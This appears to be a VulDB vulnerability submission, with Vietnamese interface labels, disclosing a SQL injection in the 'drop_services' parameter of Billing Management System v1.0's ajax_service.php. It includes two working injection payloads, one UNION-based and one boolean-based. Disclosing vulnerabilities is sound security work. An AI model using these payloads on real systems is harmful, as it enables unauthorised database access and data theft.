| tiêu đề | Billing Management System v1.0 /smartbilling_source_code/ajax_service.php POST parameter 'drop_services' exists SQL injection vulnerability |
|---|
| Mô tả | An issue was discovered in Billing Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /smartbilling_source_code/ajax_service.php POST parameter drop_services.
Payload1:drop_services=-1' union all select null,null,null,null,concat(0x616263,0x2526272829),null,null,null,null-- -
Payload2:drop_services=1' and 999=999 and 'h'='h |
|---|
| Nguồn | ⚠️ https://github.com/Yastar/bug_report/blob/main/SQLi-1.md |
|---|
| Người dùng | yastar (UID 46302) |
|---|
| Đệ trình | 09/05/2023 04:40 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 09/05/2023 14:14 (10 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 228397 [SourceCodester Billing Management System 1.0 POST Parameter ajax_service.php drop_services Tiêm SQL] |
|---|
| điểm | 20 |
|---|